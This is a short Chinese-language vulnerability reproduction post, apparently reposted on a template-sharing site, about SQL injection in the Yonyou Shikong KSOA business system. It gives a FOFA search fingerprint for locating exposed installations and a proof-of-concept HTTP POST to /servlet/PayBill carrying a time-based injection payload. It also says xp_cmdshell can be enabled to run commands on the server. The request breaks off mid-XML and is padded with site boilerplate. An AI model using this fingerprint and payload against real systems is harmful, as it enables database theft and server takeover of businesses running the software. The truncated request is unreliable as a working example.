0x01 产品简介
用友时空 KSOA 是建立在 SOA 理念指导下研发的新一代产品,是根据流通企业前沿的 IT 需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的 IT 系统之间彼此轻松对话。
0x02 漏洞概述
用友时空 KSOA 系统 PayBill、QueryService、linkadd.jsp等接口处存在 sql 注入漏洞,攻击者可通过这些漏洞获取数据库权限 ,启用xp_cmdshell 可执行任意命令获取服务器权限。
0x03 复现环境
FOFA:body="οnmοuseοut=\"this.classname='btn btnOff'\""
文章来源:https://www.toymoban.com/news/detail-759910.html
0x04 漏洞复现
PoC-1文章来源地址https://www.toymoban.com/news/detail-759910.html
POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1';WAITFOR DELAY '0:0:5'--</name><name>
到了这里,关于用友时空 KSOA 多处SQL注入漏洞复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!